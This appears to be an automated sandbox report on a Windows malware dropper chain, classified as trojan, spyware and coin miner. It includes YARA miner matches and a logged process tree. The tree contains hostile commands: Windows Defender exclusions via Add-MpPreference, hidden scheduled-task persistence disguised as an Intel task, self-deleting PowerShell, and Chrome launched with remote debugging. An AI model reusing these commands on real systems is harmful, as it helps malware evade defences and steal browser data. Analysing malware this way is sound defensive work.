                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F47AC11_2_001F47AC
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021881711_2_00218817
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E0DCC11_2_001E0DCC
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DB11411_2_001DB114
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DF1B411_2_001DF1B4
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001EC27811_2_001EC278
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021352811_2_00213528
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0020257811_2_00202578
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0020066E11_2_0020066E
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001FD66C11_2_001FD66C
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001ED85811_2_001ED858
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F694C11_2_001F694C
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002149A511_2_002149A5
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002099B811_2_002099B8
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002079DC11_2_002079DC
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DA3011_2_0021DA30
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0020FA0C11_2_0020FA0C
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DC1111_2_0021DC11
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E7C6811_2_001E7C68
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E8CA811_2_001E8CA8
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DD0011_2_0021DD00
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F6E0811_2_001F6E08
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D8F1811_2_001D8F18
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001EAF5811_2_001EAF58
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeCode function: 15_2_02B02E6015_2_02B02E60
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeCode function: 15_2_02B02EB715_2_02B02EB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037BB4A032_2_037BB4A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037BB49032_2_037BB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037B1D6A32_2_037B1D6A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037B1D1832_2_037B1D18
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_0378B49040_2_0378B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_0378C66240_2_0378C662
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_03781D0840_2_03781D08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_08F23E9840_2_08F23E98
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAA9A6844_2_00007FFD9BAA9A68
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAAA7D044_2_00007FFD9BAAA7D0
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAB2FC944_2_00007FFD9BAB2FC9
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAB035744_2_00007FFD9BAB0357
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAA5B2144_2_00007FFD9BAA5B21
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAA28FA44_2_00007FFD9BAA28FA
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAAB06744_2_00007FFD9BAAB067
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 000680C0 appears 130 times
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 007080C0 appears 130 times
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: random[4].exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: fcd2b0e3cd.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983981181880109
                      Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983981181880109
                      Source: random[3].exe.5.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                      Source: random[3].exe.5.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                      Source: 964c9facda.exe.5.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                      Source: 964c9facda.exe.5.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                      Source: random[3].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: random[3].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: 164919d456.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: 164919d456.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: random[4].exe1.5.drStatic PE information: Section: odlbdsvw ZLIB complexity 0.9941197065248027
                      Source: random[1].exe1.5.drStatic PE information: Section: hdwdyvma ZLIB complexity 0.9944403456998314
                      Source: 9c2981f3e5.exe.5.drStatic PE information: Section: hdwdyvma ZLIB complexity 0.9944403456998314
                      Source: d7884c562e.exe.5.drStatic PE information: Section: odlbdsvw ZLIB complexity 0.9941197065248027
                      Source: random[1].exe2.5.drStatic PE information: Section: mptavxer ZLIB complexity 0.9899758557225258
                      Source: 0577f55121.exe.5.drStatic PE information: Section: mptavxer ZLIB complexity 0.9899758557225258
                      Source: random[2].exe0.5.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                      Source: random[2].exe0.5.drStatic PE information: Section: ztykcjub ZLIB complexity 0.9944891402410934
                      Source: 77594b3442.exe.5.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                      Source: 77594b3442.exe.5.drStatic PE information: Section: ztykcjub ZLIB complexity 0.9944891402410934
                      Source: random[2].exe1.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: ce29828af5.exe.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: random[1].exe0.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: random[1].exe0.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 4268204ace.exe.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 4268204ace.exe.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 5119130eb96345a8a13dc770d0f33571.exe.15.dr, PayloadExtensions.csSuspicious method names: .PayloadExtensions.GetArchitectureMinimum
                      Source: 15.2.4268204ace.exe.3ce09a0.1.raw.unpack, PayloadExtensions.csSuspicious method names: .PayloadExtensions.GetArchitectureMinimum
                      Source: 5119130eb96345a8a13dc770d0f33571.exe.15.dr, PayloadV1.csSuspicious method names: .PayloadV1.Validate
                      Source: 15.2.4268204ace.exe.3ce09a0.1.raw.unpack, PayloadV1.csSuspicious method names: .PayloadV1.Validate
                      Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@132/124@0/23
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DAC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_001DAC74
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E1D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,11_2_001E1D04
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_001DABB0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wNFfgZ1[1].htmJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:740:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_03
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f6bec8ba-58ff-4dfc-9981-2ec5ebd23734}-9MSZ40SLW145
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSystem information queried: HandleInformation
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 77594b3442.exe, 00000031.00000003.2942066458.00000000052BE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941443139.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3202224956.0000000005608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: file.exeVirustotal: Detection: 55%
                      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: file.exeString found in binary or memory: WRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeW
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                      Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe "C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
